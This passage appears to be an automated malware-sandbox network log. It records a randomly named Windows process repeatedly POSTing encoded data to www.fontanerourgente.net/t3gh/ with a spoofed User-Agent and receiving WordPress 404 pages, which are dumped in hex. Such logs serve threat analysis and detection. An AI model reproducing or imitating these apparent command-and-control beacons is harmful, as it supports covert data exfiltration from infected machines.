            Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
            Sep 2, 2024 09:08:25.792192936 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
            Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
            Sep 2, 2024 09:08:25.792205095 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
            Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
            Sep 2, 2024 09:08:25.792432070 CEST672INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
            Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
            Sep 2, 2024 09:08:25.792448997 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
            Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
            Sep 2, 2024 09:08:25.792459965 CEST1236INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
            Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
            Sep 2, 2024 09:08:25.792470932 CEST1236INData Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
            Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
            Sep 2, 2024 09:08:25.792493105 CEST1236INData Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
            Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
            Sep 2, 2024 09:08:25.792592049 CEST1236INData Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
            Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
            Sep 2, 2024 09:08:25.792603016 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
            Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
            Sep 2, 2024 09:08:25.797130108 CEST1236INData Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
            Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.64972937.187.158.211802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:27.502348900 CEST803OUTPOST /t3gh/ HTTP/1.1
            Host: www.fontanerourgente.net
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.fontanerourgente.net
            Referer: http://www.fontanerourgente.net/t3gh/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 2b 77 62 2f 46 41 35 48 4d 71 76 50 46 45 65 48 45 5a 6e 4b 33 6a 78 62 4c 45 37 61 4b 57 53 37 64 68 66 2f 4b 73 56 43 45 31 54 51 3d 3d
            Data Ascii: cLqL3H=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT5+wb/FA5HMqvPFEeHEZnK3jxbLE7aKWS7dhf/KsVCE1TQ==
            Sep 2, 2024 09:08:28.335948944 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:08:27 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
            Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
            Sep 2, 2024 09:08:28.336036921 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
            Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
            Sep 2, 2024 09:08:28.336049080 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
            Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
            Sep 2, 2024 09:08:28.336061001 CEST672INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
            Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
            Sep 2, 2024 09:08:28.336074114 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
            Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
            Sep 2, 2024 09:08:28.336085081 CEST1236INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
            Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
            Sep 2, 2024 09:08:28.336162090 CEST1236INData Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
            Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
            Sep 2, 2024 09:08:28.336174965 CEST1236INData Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
            Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
            Sep 2, 2024 09:08:28.336529970 CEST1236INData Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
            Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
            Sep 2, 2024 09:08:28.336541891 CEST552INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
            Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
            Sep 2, 2024 09:08:28.342641115 CEST1236INData Raw: 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
            Data Ascii: font-size--small: 18px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 24px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--extra-small: 16px;--wp--preset--font-size--normal: 20px;--wp--preset--font-size--


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.64973037.187.158.211802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:30.065471888 CEST1816OUTPOST /t3gh/ HTTP/1.1
            Host: www.fontanerourgente.net
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.fontanerourgente.net
            Referer: http://www.fontanerourgente.net/t3gh/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 51 51 6c 53 34 69 42 43 59 31 32 30 41 51 56 6b 4f 6c 47 65 42 42 73 6f 37 7a 61 70 38 48 6f 2b 49 65 54 65 4a 70 39 59 5a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 6c 2f 45 57 42 66 67 46 43 65 74 48 73 59 6a 6a 44 59 34 67 56 6a 6e 38 63 67 4b 48 4a 52 4c 61 30 4d 57 48 6c 34 2f 68 57 57 41 44 7a 62 4a 4a 6f 48 4f 44 68 6f 69 54 4e 33 62 68 69 37 41 73 64 58 43 6d 6d 74 49 75 4c 62 70 62 62 64 42 55 [TRUNCATED]
            Data Ascii: cLqL3H=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nQQlS4iBCY120AQVkOlGeBBso7zap8Ho+IeTeJp9YZa+dDVuASdH80pu6GzO8LsQjNsgFwgJECml/EWBfgFCetHsYjjDY4gVjn8cgKHJRLa0MWHl4/hWWADzbJJoHODhoiTN3bhi7AsdXCmmtIuLbpbbdBUfBnbs5SnAx1Fyygt3JynWfLwerQZlPVhHmdiGPB40Ms1PSSmOMMkvynYlMFzLtnTAw1NN1G/BLAC9zSUF/vYFODbM7O37Vb162BdC6bkZjAYFAS0MdUUPs4XljBY3FkVUe65X7tdaP9amKlVochr+RXH4182WK6uaSOkFIP56siDFywykjnoHJH32F2ua3z59AQndjZbKsHDA60SUhbEdGuO4fb+7R9zYe2K+7UG1iE8xuIMKUfJw6yo5H5xrbgqMPm2AHsxB7VFvsUo4Yh4TuzbUj7vgH/bCMtdgbqy2Dr/W3NW4O0qj6yslc4PAxuUI3gOAvyM0vCFrga0aJfRbyXBW4qWDS+AzQp48LPL9a8E3Lz3qALiZ6rDPXnLSD8SXrY90smstyLO4QLRgecBihVmQ3V8U7mXoTW5vsNY8R806uJ+Tfh0AvWX7/jCsR8xef+0AZ5c42BWq3LGPj7bYPKmiB27SabncM0f+G71E3OgCxfr+Yd5v+eG3Ewfv+r220m5s38RnV9mAXuwvmpnb+i7PJDeLC2JXwblFyLIsFgNowft5Rs5ONSgliMG+eHzNk0qXosGqLJU3gKmW6/TYrN+OU8RCZvnUxZ6Zhji96vZYrxFEyTrV68Au3nn5zUJB3ygn3cy6Or4mtSegjjgoztsDiSP/HkgK2 [TRUNCATED]
            Sep 2, 2024 09:08:30.976118088 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:08:30 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
            Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
            Sep 2, 2024 09:08:30.976288080 CEST224INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
            Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
            Sep 2, 2024 09:08:30.976299047 CEST1236INData Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
            Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
            Sep 2, 2024 09:08:30.976309061 CEST1236INData Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
